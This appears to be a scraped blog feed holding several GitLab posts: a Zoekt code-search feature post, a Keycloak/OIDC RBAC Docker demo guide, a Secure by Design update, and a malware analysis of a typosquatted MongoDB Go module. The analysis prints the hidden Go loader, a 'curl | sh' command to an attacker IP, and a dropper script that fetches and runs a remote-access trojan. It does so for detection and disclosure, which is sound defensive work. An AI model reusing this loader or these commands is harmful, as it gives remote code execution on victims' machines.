scale\n\nZoekt excels at exact matches and is optimized for regular expression searches. The engine uses sophisticated algorithms to convert regex patterns into efficient trigram queries when possible, maintaining speed even for complex patterns across terabytes of code.\n\n## Built for enterprise scale\n\nExact Code Search is powerful and built to handle massive scale with impressive performance. This is not just a new UI feature — it's powered by a completely reimagined backend architecture.\n\n### Handling terabytes of code with ease\n\nOn GitLab.com alone, our Exact Code Search infrastructure indexes and searches over **48 TB** of code data while maintaining lightning-fast response times. This scale represents millions of repositories across thousands of namespaces, all searchable within milliseconds. To put this in perspective: This scale represents more code than the entire Linux kernel, Android, and Chromium projects combined. Yet Exact Code Search can find a specific line across this massive codebase in milliseconds.\n\n### Self-registering node architecture\n\nOur innovative implementation features:\n\n* **Automatic node registration:** Zoekt nodes register themselves with GitLab\n* **Dynamic shard assignment:** The system automatically assigns namespaces to nodes\n* **Health monitoring:** Nodes that don't check in are automatically marked offline\n\nThis self-configuring architecture dramatically simplifies scaling. When more capacity is needed, administrators can simply add more nodes without complex reconfiguration.\n\n### Distributed system with intelligent load balancing\n\nBehind the scenes, Exact Code Search operates as a distributed system with these key components:\n\n* **Specialized search nodes:** Purpose-built servers that handle indexing and searching\n* **Smart sharding:** Code is distributed across nodes based on namespaces\n* **Automatic load balancing:** The system intelligently distributes work based on capacity\n* **High availability:** Multiple replicas ensure continuous operation even if nodes fail\n\n*Note: High availability is built into the architecture but not yet fully enabled. See [Issue 514736](https://gitlab.com/gitlab-org/gitlab/-/issues/514736) for updates.*\n\n### Seamless security integration\n\nExact Code Search automatically integrates with GitLab's permission system:\n\n* Search results are filtered based on the user's access rights\n* Only code from projects the user has access to is displayed\n* Security is built into the core architecture, not added as an afterthought\n\n### Optimized performance\n\n* **Efficient indexing:** Large repositories are indexed in tens of seconds\n* **Fast query execution:** Most searches return results with sub-second response times\n* **Streaming results:** The new gRPC-based federated search streams results as they're found\n* **Early termination:** Once enough results are collected, the system pauses searching\n\n## From library to distributed system: Engineering challenges we solved\n\nWhile Zoekt provided the core search technology, it was originally designed as a minimal library for managing `.zoekt` index files - not a distributed database or enterprise-scale service. Here are the key engineering challenges we overcame to make it work at GitLab's scale\"\n\n### Challenge 1: Building an orchestration layer\n\n**The problem:** Zoekt was designed to work with local index files, not distributed across multiple nodes serving many concurrent users.\n\n**Our solution:** We built a comprehensive orchestration layer that:\n\n* Creates and manages database models to track nodes, indices, repositories, and tasks\n* Implements a self-registering node architecture (inspired by GitLab Runner)\n* Handles automatic shard assignment and load balancing across nodes\n* Provides bidirectional API communication between GitLab Rails and Zoekt nodes\n\n### Challenge 2: Scaling storage and indexing\n\n**The problem:** How do you efficiently manage terabytes of index data across multiple nodes while ensuring fast updates?\n\n**Our solution:** We implemented:\n\n* Intelligent sharding: Namespaces are distributed across nodes based on capacity and load\n* Independent replication: Each node independently indexes from [Gitaly](https://gitlab.com/gitlab-org/gitaly) (our Git storage service), eliminating complex synchronization\n* Watermark management: Sophisticated storage allocation that prevents nodes from running out of space\n* Unified binary architecture: A single `gitlab-zoekt` binary that can operate in both indexer and webserver modes\n\n### Challenge 3: Permission Integration\n\n**The problem:** Zoekt had no concept of GitLab's complex permission system - users should only see results from projects they can access.\n\n**Our solution:** We built native permission filtering directly into the search flow:\n\n* Search requests include user permission context\n* Results are filtered to include only those the user can access in case permissions change before indexing completes\n\n### Challenge 4: Operational simplicity\n\n**The problem:** Managing a distributed search system shouldn't require a dedicated team.\n\n**Our solution:**\n\n* Auto-scaling: Adding capacity is as simple as deploying more nodes - they automatically register and start handling work\n* Self-healing: Nodes that don't check in are automatically marked offline and their work redistributed\n* Zero-configuration sharding: The system automatically determines optimal shard assignments\n\n## Gradual rollout: Minimizing risk at scale\n\nRolling out a completely new search backend to millions of users required careful planning. Here's how we minimized customer impact while ensuring reliability:\n\n### Phase 1: Controlled testing (gitlab-org group)\n\nWe started by enabling Exact Code Search only for the `gitlab-org` group - our own internal repositories. This allowed us to:\n\n* Test the system with real production workloads\n* Identify and fix performance bottlenecks\n* Streamline the deployment process\n* Learn from real users' workflows and feedback\n\n### Phase 2: Performance validation and optimization\n\nBefore expanding, we focused on ensuring the system could handle GitLab.com's scale:\n\n* Implemented comprehensive monitoring and alerting\n* Validated storage management with real production data growth\n\n### Phase 3: Incremental customer expansion\n\nWe gradually expanded to customers interested in testing Exact Code Search:\n\n* Gathered feedback on performance and user experience\n* Refined the search UI based on real user workflows\n* Optimized indexing performance (large repositories like `gitlab-org/gitlab` now index in ~10 seconds)\n* Refined the architecture based on operational learnings\n* Massively increased indexing throughput and improved state transition livecycle\n\n### Phase 4: Broad rollout\n\nToday, over 99% of Premium and Ultimate licensed groups on GitLab.com have access to Exact Code Search. Users can:\n\n* Toggle between regex and exact search modes\n* Experience the benefits without any configuration changes\n* Fall back to the previous search if needed (though few choose to)\n\nRolling this out gradually meant users didn't experience service disruptions, performance degradation, or feature gaps during the transition. We've already received positive feedback from users as they notice their results becoming more relevant and faster.\n\n> **For technical deep dive:** Interested in the detailed architecture and implementation? Check out our comprehensive [design document](https://handbook.gitlab.com/handbook/engineering/architecture/design-documents/code_search_with_zoekt/) for in-depth technical details about how we built this distributed search system.\n\n## Getting started with Exact Code Search\n\nGetting started with Exact Code Search is simple because it's already enabled by default for Premium and Ultimate groups on GitLab.com (over 99% of eligible groups currently have access).\n\n### Quickstart guide\n\n1. Navigate to the Advanced Search in your GitLab project or group\n2. Enter your search term in the code tab\n3. Toggle between Exact Match and Regular Expression modes\n4. Use filters to refine your search\n\n### Basic search syntax\n\nWhether using Exact Match or Regular Expression mode, you can refine your search with modifiers:\n\n| Query Example | What It Does                                             |\n| ------------- | -------------------------------------------------------- |\n| `file:js`     | Searches only in files containing \"js\" in their name     |\n| `foo -bar`    | Finds \"foo\" but excludes results with \"bar\"              |\n| `lang:ruby`   | Searches only in Ruby files                              |\n| `sym:process` | Finds \"process\" in symbols (methods, classes, variables) |\n\n> **Pro Tip:** For the most efficient searches, start specific and then broaden if needed. Using `file:` and `lang:` filters dramatically increases relevance.\n\n### Advanced search techniques\n\nStack multiple filters for precision:\n\n```\nis_expected file:rb -file:spec\n```\n\nThis finds \"is_expected\" in Ruby files that don't have \"spec\" in their name.\n\nUse regular expressions for powerful patterns:\n\n```\ntoken.*=.*[\\\"']\n```\n\n[Watch this search performed against the GitLab Zoekt repository.](https://gitlab.com/search?search=token.*%3D.*%5B%5C%22'%5D&nav_source=navbar&project_id=46649240&group_id=9970&search_code=true&repository_ref=main&regex=true)\n\nThe search helps find hardcoded passwords, which, if not found, can be a security issue.\n\nFor more detailed syntax information, check the [Exact Code Search documentation](https://docs.gitlab.com/user/search/exact_code_search/#syntax).\n\n## Availability and deployment\n\n### Current availability\n\nExact Code Search is currently in Beta for GitLab.com users with Premium and Ultimate licenses:\n\n* Available for over 99% of licensed groups\n* Search in the UI automatically uses Zoekt when available, Exact Code Search in Search API is behind a feature flag\n\n### Self-managed deployment options\n\nFor self-managed instances, we offer several deployment methods:\n\n* Kubernetes/Helm: Our most well-supported method, using our [`gitlab-zoekt` Helm chart](https://gitlab.com/gitlab-org/cloud-native/charts/gitlab-zoekt)\n* Other deployment options: We're working on streamlining deployment for Omnibus and other installation methods\n\nSystem requirements depend on your codebase size, but the architecture is designed to scale horizontally and/or vertically as your needs grow.\n\n## What's coming next\n\nWhile Exact Code Search is already powerful, we're continuously improving it:\n\n* **Scale optimizations** to support instances with hundreds of thousands of repositories\n* **Improved self-managed deployment** options, including streamlined Omnibus support\n* **Full high availability support** with automatic failover and load balancing\n\nStay tuned for updates as we move from Beta to General Availability.\n\n## Transform how you work with code\n\nGitLab's Exact Code Search represents a fundamental rethinking of code discovery. By delivering exact matches, powerful regex support, and contextual results, it solves the most frustrating aspects of code search:\n\n* No more wasting time with irrelevant results\n* No more missing important matches\n* No more clicking through files just to understand basic context\n* No more performance issues as codebases grow\n\nThe impact extends beyond individual productivity:\n\n* **Teams collaborate better** with easy code referencing\n* **Knowledge sharing accelerates** when patterns are discoverable\n* **Onboarding becomes faster** with quick codebase comprehension\n* **Security improves** with effective pattern auditing\n* **Technical debt reduction** becomes more feasible\n\nExact Code Search isn't just a feature, it's a better way to understand and work with code. Stop searching and start finding.\n\n**We'd love to hear from you!** Share your experiences, questions, or feedback about Exact Code Search in our [feedback issue](https://gitlab.com/gitlab-org/gitlab/-/issues/420920). Your input helps us prioritize improvements and new features.\n\n> #### Ready to experience smarter code search? Learn more in our [documentation](https://docs.gitlab.com/ee/user/search/exact_code_search.html) or try it now by performing a search in your Premium or Ultimate licensed namespaces or projects. Not a GitLab user yet? Try [a free, 60-day trial of GitLab Ultimate with Duo](https://about.gitlab.com/free-trial/)!",[757,786,900],{"featured":6,"template":789,"slug":1122},"exact-code-search-find-code-faster-across-repositories",{"category":125,"slug":767,"posts":1124},[1125,1137,1151],{"content":1126,"config":1135},{"title":1127,"description":1128,"authors":1129,"heroImage":1131,"body":1132,"category":767,"tags":1133,"date":1134},"GitLab catches MongoDB Go module supply chain attack","Learn how GitLab detected a supply chain attack targeting Go developers through fake MongoDB drivers that deploy persistent backdoor malware.",[1130],"Michael Henriksen","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750098739/Blog/Hero%20Images/Blog/Hero%20Images/AdobeStock_282096522_securitycompliance.jpeg_1750098739024.jpg","Software supply chain attacks via malicious dependencies continue to be one of the most significant security threats to modern software development. The widespread use of open source components has enabled development teams to build applications rapidly, but it has also widened the attack surface area. The growing ecosystem of third-party packages presents numerous opportunities for attackers to exploit dependencies through techniques like typosquatting, dependency confusion, and package impersonation, making it increasingly challenging for developers to distinguish legitimate packages from malicious imposters.\n\nTo address this challenge, GitLab's Vulnerability Research team recently developed an automated detection system designed to proactively identify malicious dependencies in software supply chains. The system combines multiple detection techniques that work in concert:\n\n- Automated typosquatting detection, which identifies suspicious naming patterns\n- Semantic code analysis, which flags potentially malicious behaviors like network requests or command executions\n- AI-assisted initial screening for advanced payload and obfuscation detection\n\nThis multi-layered approach is used by the vulnerability research team to continuously scan newly published dependencies across major ecosystems, providing early warning of supply chain attacks.\n\nUsing this detection system, GitLab recently identified a live typosquatting attack in the wild that leveraged a malicious MongoDB Go module. Below are details on the attack and how GitLab works to keep supply chains safe.\n\n## Executive summary: A MongoDB module that's not quite right\n\nOur detection system flagged a newly published Go module called `github.com/qiniiu/qmgo`, closely mimicking the popular [MongoDB](https://www.mongodb.com/) module `github.com/qiniu/qmgo`. The legitimate module describes itself as \"The Go driver for MongoDB\" and has gained traction in the Go community.\n\nTo disguise the malicious module as legitimate, the threat actor used a GitHub username nearly identical to the one associated with the real module with one subtle change: they added one “i” (`qiniu` → `qiniiu`). To the casual observer scrolling through search results or auto-complete suggestions, this difference would be very easy to overlook.\n\nThe new module’s code was a working copy of the legitimate `qmgo` module. However, malicious code was inserted into the `NewClient` function in `client.go`, a function that developers would naturally call when initializing their MongoDB connection. Concealing malicious code within a function made the payload less likely to be executed during potential runtime security analysis, while ensuring that it would execute from normal usage in real applications.\n\nAfter reporting the malicious module, it was removed within approximately 19 hours of our initial report. However, the threat actor quickly adapted, publishing a second typosquatted version (`github.com/qiiniu/qmgo`) just four days later with identical malicious code. This follow-up attack was also detected and taken down roughly one hour after initial discovery. The rapid redeployment demonstrates the persistent nature of these attacks and highlights why proactive detection is crucial in minimizing exposure windows.\n\n## Technical deep dive: Peeling back the layers\n\nThe threat actor took steps to hide the attack. The malicious payload used a multilayered approach, starting with a compact code snippet that triggered a chain of remote payload downloads:\n\n```go  \ntxt, err := script.Get(\"https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html\").String()  \nif err == nil {  \n    txt2, err := script.Get(string(strings.Replace(txt, \"\\n\", \"\", -1))).String()  \n    if err == nil {  \n        exec.Command(\"/bin/sh\", \"-c\", string(txt2)).Start()  \n    }  \n}  \n```\n\nThe attack unfolds in four distinct layers:\n\n**Layer 1:** The code fetches `update.html` from another repository owned by the typosquat account `qiiniu/vue-element-admin`. The file contained a single line: \n\n```  \nhttps://img.googlex.cloud/seed.php\n```\n\n**Layer 2:** The code then fetches `https://img.googlex.cloud/seed.php`, which returns a single shell command, which is executed: \n\n```bash  \ncurl -s http://207.148.110.29:80/logon61.gif|sh\n```\n\n**Layer 3:** The command tells the system to fetch `http://207.148.110.29:80/logon61.gif` using curl and execute the response as a shell script.  The shell script downloads what appears to be an MP3 file (`chainelli.mp3`) to `/tmp/vod`, makes it executable, runs it, and immediately deletes it:\n\n```bash  \n#!/bin/sh  \nrm -rf /tmp/vod  \ncurl -s http://207.148.110.29:80/chainelli.mp3 -o /tmp/vod  \nchmod 777 /tmp/vod  \n/tmp/vod  \nrm -rf /tmp/vod  \n```\n\n**Layer 4:** The `chainelli.mp3` file is actually a statically-linked, stripped ELF Go binary designed to establish persistent remote access. Once executed, the malware attempts to connect to its command and control server at `ellipal.spoolsv.cyou` on Port 443 (both TCP and UDP), using a custom encrypted communication protocol with a hardcoded RSA key. From there, it provides the threat actor with remote administration capabilities:\n\n* Complete remote shell access and one-off command execution  \n* Screenshot captures  \n* SOCKS proxy functionality to make connections through the compromised machine  \n* Configurable sleep interval between check-ins with the command and control server to avoid detection  \n* Standard remote access trojan features like filesystem browsing and upload/download\n\n## They're back (already)\n\nJust four days after GitLab reported the initial malicious module and saw it removed, `github.com/qiiniu/qmgo` appeared – the second typosquatted version with identical malicious code. This quick redeployment demonstrates the persistent nature of these attacks and highlights how threat actors adapt quickly to takedown efforts.\n\n## GitLab’s approach: Finding needles in haystacks\n\nThe initial discovery and persistence of this attack validated our approach to proactive dependency monitoring and threat detection. GitLab’s detection system combines multiple techniques to identify malicious dependencies:\n\n**Typosquatting detection:** GitLab monitors newly published dependencies and looks for packages that exhibit signs of various typosquatting strategies.\n\n**Semantic heuristics:** Our system statically analyzes code for patterns like network requests, command executions, and other behaviors typical of malicious payloads.\n\n**AI-assisted analysis:** A [large language model](https://about.gitlab.com/blog/what-is-a-large-language-model-llm/) does the initial analysis of the suspicious parts of the code to help us weed out obvious false positives, detect complex payloads, and identify obfuscation techniques used to hide malicious intent.\n\n**Human review:** A human receives an alert to verify the finding and to perform advanced analysis.\n\n## Recommendations: Staying ahead of persistent supply chain threats\n\nThis attack highlights the ongoing challenges in securing software supply chains. The multilayered obfuscation and rapid redeployment after takedown demonstrate that threat actors are willing to invest significant effort in targeting popular dependencies.\n\nThe quick pivot to new typosquatted packages after our initial report highlights a fundamental weakness in the current ecosystems: package managers typically only remove malicious dependencies after they've been published, discovered, and reported by the community. This reactive approach leaves a dangerous window where developers can unknowingly consume compromised packages. Proactive monitoring and detection systems like the one GitLab has developed can help close this gap by identifying threats during the publication process itself.\n\nWe've provided indicators of compromise (IOCs) in the next section, which you can use in your monitoring systems to detect this specific campaign.\n\n## Indicators of compromise\n\n| IOC | Description |\n| :---- | :---- |\n| `github.com/qiniiu/qmgo` | Malicious Go module |\n| `github.com/qiiniu/qmgo` | Malicious Go module |\n| `https://raw.githubusercontent.com/qiniiu/vue-element-admin/refs/heads/main/public/update.html` | Payload delivery URL |\n| `https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html` | Payload delivery URL |\n| `https://img.googlex.cloud/seed.php` | Payload delivery URL |\n| `http://207.148.110.29:80/logon61.gif` | Payload delivery URL |\n| `http://207.148.110.29:80/chainelli.mp3` | Payload delivery URL |\n| `img.googlex.cloud` | Payload delivery host |\n| `207.148.110.29` | Payload delivery host |\n| `ellipal.spoolsv.cyou` | Command & Control host |\n| `6ada952c592f286692c59028c5e0fc3fa589759f` | SHA-1 checksum of chainelli.mp3 remote administration malware |\n| `8ae533e2d1d89c871908cbcf5c7d89c433d09b2e7f7d4ade3aef46c55b66509c` | SHA-256 checksum of chainelli.mp3 remote administration malware |\n| `/tmp/vod` | Temporary download location of chainelli.mp3 remote administration malware |\n\n## How GitLab helps secure the software supply chain \n\nMalicious dependencies, like the MongoDB Go module attack, highlight why securing the software supply chain requires more than just CVE monitoring. GitLab’s DevSecOps platform includes [Application Security Testing](https://docs.gitlab.com/user/application_security/secure_your_application/) scanners like Software Composition Analysis in the development lifecycle, helping teams catch vulnerable or malicious packages before they reach production. \n\nPaired with research efforts like this, GitLab aims to enable developers to build applications that are secure from the start without compromising on development velocity. \n\n## Timeline\n\n* **2025-06-01T09:31:** GitLab reports `github.com/qiniiu/qmgo` to Go Security  \n* **2025-06-01T09:43:** GitLab reports `github.com/qiniiu/qmgo` to GitHub  \n* **2025-06-01T10:14:** GitLab reports `ellipal.spoolsv.cyou` (`188.166.213.194`) to the IP block owner \n* **2025-06-02T04:03:** Go Security takes down `github.com/qiniiu/qmgo`\n* **2025-06-02T09:57:** The IP block owner suspends `188.166.213.194`\n* **2025-06-03T09:15:** GitHub suspends `github.com/qiniiu`\n* **2025-06-05T17:15:** GitLab reports `github.com/qiiniu/qmgo` to Go Security  \n* **2025-06-05T17:33:** GitLab reports `github.com/qiiniu/qmgo` to GitHub  \n* **2025-06-05T17:45:** Go Security takes down `github.com/qiiniu/qmgo`\n* **2025-06-06T12:25:** GitHub suspends `github.com/qiiniu`",[767,757],"2025-06-30",{"featured":91,"template":789,"slug":1136},"gitlab-catches-mongodb-go-module-supply-chain-attack",{"content":1138,"config":1149},{"title":1139,"description":1140,"heroImage":1141,"date":1142,"body":1143,"category":767,"tags":1144,"authors":1145},"Automating role-based access control (RBAC) at scale","This guide details setting up GitLab + Keycloak + OIDC for RBAC, covering planning, Docker configuration, and automated access governance for DevSecOps.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659561/Blog/Hero%20Images/securitycheck.png","2025-06-20","Security starts with structure. Building a scalable and secure development platform begins with getting the fundamentals right — especially role-based access control (RBAC).\n\nTo help our customers scale effectively, we developed the RBAC Accelerator — a modular, outcome-driven enablement program that supports large organizations in defining, enforcing, and scaling access policies across GitLab.\n\nThis foundation enables broader transformation. For example, the Secure SDLC Accelerator, built on top of the RBAC Accelerator, empowers customers to integrate compliance, security, and DevSecOps best practices into their workflows.\n\nGitLab customer [Lely](https://www.lelyna.com/us/), a major Dutch manufacturer of agricultural machines and robots, used this approach to migrate to GitLab Dedicated. Lely automated user provisioning via Azure AD using OpenID Connect (OIDC), enforced [least-privilege policies](https://about.gitlab.com/blog/the-ultimate-guide-to-least-privilege-access-with-gitlab/), and created a scalable, reusable access model to support their future development initiatives.\n\nIn this guide, we’ll take you through a hands-on implementation example of GitLab + [Keycloak](https://www.keycloak.org/) + OIDC, covering everything from running the setup in a Docker environment to automating role mapping, designing a scalable group hierarchy, and aligning GitLab access controls with organizational structure and compliance goals.\n\nThis is a local demo setup intended for proof-of-concept purposes only.\n\nWhether you’re just starting out or optimizing at scale, this modular foundation ensures you’re not just securing access — you’re enabling everything that comes next.\n\n## Getting started with access control planning\n\nBefore implementing any tooling, it’s essential to understand your access landscape. \n\nConsider:\n- What GitLab resources need protection (projects, groups, environments)?\n- Who are your personas (Developers, Maintainers, Guests, etc.)?\n- What organizational units (departments, cost centers) should govern access?\n- How does your IdP structure (Keycloak) define users and roles?\n\nUse this stage to draft your:\n- Access control matrix\n- GitLab group hierarchy (team- or product-based)\n- Least privilege policy assumptions\n\nSample group hierarchy \n\n```mermaid\ngraph TD\n    Root[\"Root (Root Group)\"]\n    FirmwareTeam[\"Firmware-Team\"]\n    FirmwareDevelopers[\"Developers (GitLab Developer Role)\"]\n    FirmwareMaintainers[\"Maintainers (GitLab Maintainer Role)\"]\n    FirmwareReporters[\"Reporters (GitLab Reporter Role)\"]\n    HardwareTeam[\"Hardware-Team\"]\n    HardwareDevelopers[\"Developers\"]\n    SoftwareTeam[\"Software-Team\"]\n    SoftwareDevelopers[\"Developers\"]\n    SoftwareMaintainers[\"Maintainers\"]\n    SoftwareReporters[\"Reporters\"]\n    \n    Enterprise --> FirmwareTeam\n    Enterprise --> HardwareTeam\n    Enterprise --> SoftwareTeam\n    \n    FirmwareTeam --> FirmwareDevelopers\n    FirmwareTeam --> FirmwareMaintainers\n    FirmwareTeam --> FirmwareReporters\n    \n    HardwareTeam --> HardwareDevelopers\n    \n    SoftwareTeam --> SoftwareDevelopers\n    SoftwareTeam --> SoftwareMaintainers\n    SoftwareTeam --> SoftwareReporters\n```\n\n## Demo system setup: GitLab + Keycloak in a local Docker environment\n### Prerequisites\n\n- Docker, Docker Compose, OpenSSL\n- GitLab Version 17.7.3 and Keycloak Version 23.0.7 container images\n- Self-signed certificates\n\n### .env configuration\n\nThe demo setup is using the following GitLab and Keycloak versions, ports and secrets.\n\n#### GitLab configuration\n\n```bash\nGITLAB_VERSION=17.7.3-ee.0\nGITLAB_EXTERNAL_URL=http://localhost:8081\nGITLAB_SSH_PORT=8222\n```\n\n####  Keycloak configuration\n\n```bash\nKEYCLOAK_VERSION=latest\nKEYCLOAK_ADMIN=\u003Cyour-admin-username>\nKEYCLOAK_ADMIN_PASSWORD=\u003Cyour-admin-password>\nKEYCLOAK_HTTPS_PORT=8443\nKEYCLOAK_CLIENT_SECRET=\u003Cyour-client-secret>  # Get this from Keycloak after setup\n```\n\n## Generate SSL certificates\n\nTo establish trust between GitLab and Keycloak, especially in a self-hosted Docker environment, we’ll need to generate self-signed SSL certificates. These certificates will enable encrypted HTTPS communication and ensure GitLab can securely talk to Keycloak during the OIDC authentication process.\n\nFor production environments, we recommend using certificates from a trusted Certificate Authority (CA), but for local testing and development, self-signed certificates are sufficient.\n\nFollow these step-by-step instructions:\n\n1. Create a folder for the certificates.\n\n\n``` mkdir -p certs```\n\n2. Generate a self-signed certificate with OpenSSL.\n\n```bash\nopenssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\n  -keyout certs/tls.key \\\n  -out certs/tls.crt \\\n  -subj \"/CN=keycloak\" \\\n  -addext \"subjectAltName=DNS:keycloak,DNS:localhost\"\n```\n\n3. Create a PKCS12 keystore for Keycloak.\n\n\n```bash\nopenssl pkcs12 -export \\\n  -in certs/tls.crt \\\n  -inkey certs/tls.key \\\n  -out certs/keystore.p12 \\\n  -name keycloak \\\n  -password pass:password\n```\n\n## Start the service using Docker compose\n\nNow that we have our certificates, we can stand up our local GitLab + Keycloak environment using Docker Compose:\n\n\n```yaml\nversion: '3.8'\nservices:\n  gitlab:\n    image: gitlab/gitlab-ee:${GITLAB_VERSION}\n    container_name: gitlab\n    restart: unless-stopped\n    environment:\n      GITLAB_OMNIBUS_CONFIG: |\n        external_url '${GITLAB_EXTERNAL_URL:-http://localhost:8081}'\n        gitlab_rails['gitlab_shell_ssh_port'] = ${GITLAB_SSH_PORT:-8222}\n        gitlab_rails['display_initial_root_password'] = true\n\n        # OAuth Configuration\n        gitlab_rails['omniauth_enabled'] = true\n        gitlab_rails['omniauth_allow_single_sign_on'] = ['openid_connect']\n        gitlab_rails['omniauth_block_auto_created_users'] = false\n        gitlab_rails['omniauth_providers'] = [\n            {\n                'name' => 'openid_connect',\n                'label' => 'Keycloak',\n                'args' => {\n                    'name' => 'openid_connect',\n                    'scope' => ['openid', 'profile', 'email'],\n                    'response_type' => 'code',\n                    'issuer' => 'https://localhost:8443/realms/GitLab',\n                    'client_auth_method' => 'query',\n                    'discovery' => false,\n                    'uid_field' => 'preferred_username',\n                    'pkce' => true,\n                    'client_options' => {\n                        'identifier' => 'gitlab',\n                        'secret' => '${KEYCLOAK_CLIENT_SECRET}',\n                        'redirect_uri' => '${GITLAB_EXTERNAL_URL:-http://localhost:8081}/users/auth/openid_connect/callback',\n                        'authorization_endpoint' => 'https://localhost:8443/realms/GitLab/protocol/openid-connect/auth',\n                        'token_endpoint' => 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/token',\n                        'userinfo_endpoint' => 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/userinfo',\n                        'jwks_uri' => 'https://keycloak:8443/realms/GitLab/protocol/openid-connect/certs'\n                    }\n                }\n            }\n        ]\n    volumes:\n      - gl-config:/etc/gitlab\n      - gl-data:/var/opt/gitlab\n      - ./certs/tls.crt:/etc/gitlab/trusted-certs/keycloak.crt\n    ports:\n      - '${GITLAB_EXTERNAL_PORT:-8081}:8081'\n      - '${GITLAB_SSH_PORT:-8222}:22'\n    shm_size: '256m'\n\n  keycloak:\n    image: quay.io/keycloak/keycloak:${KEYCLOAK_VERSION}\n    container_name: keycloak-server\n    restart: unless-stopped\n    command: [\n      \"start-dev\",\n      \"--import-realm\",\n      \"--https-port=${KEYCLOAK_HTTPS_PORT}\",\n      \"--https-key-store-file=/etc/x509/https/keystore.p12\",\n      \"--https-key-store-password=password\"\n    ]\n    volumes:\n      - ./data:/opt/keycloak/data/import\n      - ./certs:/etc/x509/https\n    environment:\n      KEYCLOAK_ADMIN: ${KEYCLOAK_ADMIN}\n      KEYCLOAK_ADMIN_PASSWORD: ${KEYCLOAK_ADMIN_PASSWORD}\n    ports:\n      - \"${KEYCLOAK_HTTPS_PORT}:8443\"\n\nvolumes:\n  gl-config:\n  gl-data:\n```\n\n  \nRun the `docker-compose up -d` command and your GitLab + Keycloak environment will be up in minutes.\n\n\n```\ndocker-compose up -d\n```\n\n## Keycloak realm configuration\n\nYour Keycloak realm is automatically configured on startup as it's defined in the `docker-compose` file.\n\nThe realm configuration will include:\n\n- Pre-configured GitLab client\n- Default client secret\n\nYou can access Keycloak admin console at `https://localhost:8443` with:\n\n- Username: admin\n- Password: from your `.env` file\n- To verify the setup:\n  - Log into Keycloak admin console\n  - Select the **GitLab** realm\n  - Check **Clients > gitlab**\n\n\nVerify the client configuration matches your environment.\n\nTo showcase the automated RBAC mechanism, you will need to follow these steps:\n\n- Map realm roles to GitLab roles\n- Create group structure with mapping roles, matching the Group, Sub-group, Project pattern in GitLab.\n\nBefore provisioning your first users to the user groups, it’s recommended to log into your GitLab instance to retrieve your instance root password:\n\n1. Access GitLab at `http://localhost:8081`.\n\n2. Get the root password:\n\n``` \ndocker exec gitlab grep 'Password:' `/etc/gitlab/initial_root_password`\n\n```\n\n3. Log in as root with the retrieved password.\n\n## Putting it all together\n\nTo demonstrate the power of this integrated RBAC model, start by walking through a real-world user journey — from identity to access. \n\nBegin in Keycloak by showcasing a user assigned to specific realm roles (e.g., developer, maintainer) and groups (e.g., /engineering/platform). These roles have been mapped to GitLab access levels via OIDC claims, while group affiliations align with GitLab’s structured hierarchy of root groups, sub-groups, and projects. \n\nUpon login through GitLab’s SSO Keycloak endpoint, the user is automatically provisioned into the correct group and assigned the appropriate role — with no manual intervention. \n\nWithin GitLab, you can see that the  user can interact with the assigned project: For example, a developer might push code and open a merge request, but not merge to protected branches — validating the least-privilege model. \n\nFinally, you can showcase access across multiple teams or products that are managed centrally in Keycloak, yet enforced precisely in GitLab through group sync and permissions inheritance. This demo illustrates not just role assignment, but how GitLab and Keycloak together deliver real-time, automated access governance at scale — ready for secure, compliant, enterprise-grade software development.\n\n## Why GitLab?\n\nGitLab’s comprehensive, intelligent DevSecOps platform is the ideal foundation for secure, scalable access management. With native OIDC support, granular role enforcement, SCIM-based user provisioning, and built-in audit logging, GitLab allows organizations to centralize control without compromising agility. Its flexible group hierarchy mirrors enterprise structure, making it easy to manage access across teams. \n\nIntegrating with identity providers like Keycloak automates onboarding, ensures least-privilege access, and creates a seamless identity-to-permission pipeline that supports regulatory and security goals. As a core component of GitLab’s security capabilities, RBAC ties directly into CI/CD, policy enforcement, and vulnerability management workflows.\n\n## Summary\nRBAC is just the beginning. With GitLab and Keycloak, you’re not just securing access — you’re enabling structured, automated governance that scales. As you expand into policy enforcement, Secure SDLC, and DevSecOps automation, this foundation becomes a launchpad for sustainable, enterprise-grade software delivery.\n\n> Get started with RBAC in GitLab today with a free, 60-day trial of GitLab Ultimate. [Sign up today](https://about.gitlab.com/free-trial/)!",[767],[1146,1147,1148],"James Wormwell","Paul Meresanu","Kees Valkhof",{"featured":91,"template":789,"slug":1150},"automating-role-based-access-control-rbac-at-scale",{"content":1152,"config":1161},{"title":1153,"description":1154,"authors":1155,"heroImage":1157,"date":1158,"body":1159,"category":767,"tags":1160},"Last year we signed the Secure by Design pledge - here's our progress","Learn about GitLab's CISA-aligned additions and improvements around MFA, default password reduction, patching, and vulnerability disclosure.",[1156],"Joseph Longo","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659684/Blog/Hero%20Images/AdobeStock_479904468__1_.jpg","2025-06-09","A little over a year go, GitLab signed [CISA’s Secure by Design Pledge](https://about.gitlab.com/blog/secure-by-design-principles-meet-devsecops-innovation-in-gitlab-17/), a directive for technology providers to embed security at the heart of their products from the outset of development. Since then, we've made significant progress towards improving our security posture and creating a more secure ecosystem for our customers to develop secure software faster.\n\n## Meeting the security goals\n\nLet’s explore the additions and improvements we've made to further enhance security across the development lifecycle.\n\n### Multi-factor authentication (MFA)\n\n***Goal: Within one year of signing the pledge, demonstrate actions taken to measurably increase the use of multi-factor authentication across the manufacturer’s products.***\n\nGitLab currently offers multiple [MFA](https://docs.gitlab.com/ee/user/profile/account/two_factor_authentication.html) options for users to secure their accounts. We also offer SSO functionality to enable [GitLab.com](https://docs.gitlab.com/ee/user/group/saml_sso/), [Self-Managed](https://docs.gitlab.com/integration/saml/), and [GitLab Dedicated](https://docs.gitlab.com/integration/saml/) customers to streamline their authentication processes and their internal MFA requirements.\n\nTo further enhance the platform’s resilience, and to create a more secure foundation for our customers, GitLab is executing a phased MFA by Default rollout.\n\nIn the coming months, we will deploy changes requiring all customers to enable MFA on their accounts. \n\nFor customers who already have MFA enabled or authenticate to GitLab via their organization’s single sign-on (SSO) method, there will be no necessary changes. For customers who do not already have MFA enabled and are not authenticating to GitLab via their organization’s SSO method, they will be required to enable MFA and enroll in one or more of the available MFA methods.\n\nThe MFA rollout will occur in stages to ensure a smooth and consistent adoption across all customers. More details on GitLab’s MFA by Default rollout will be 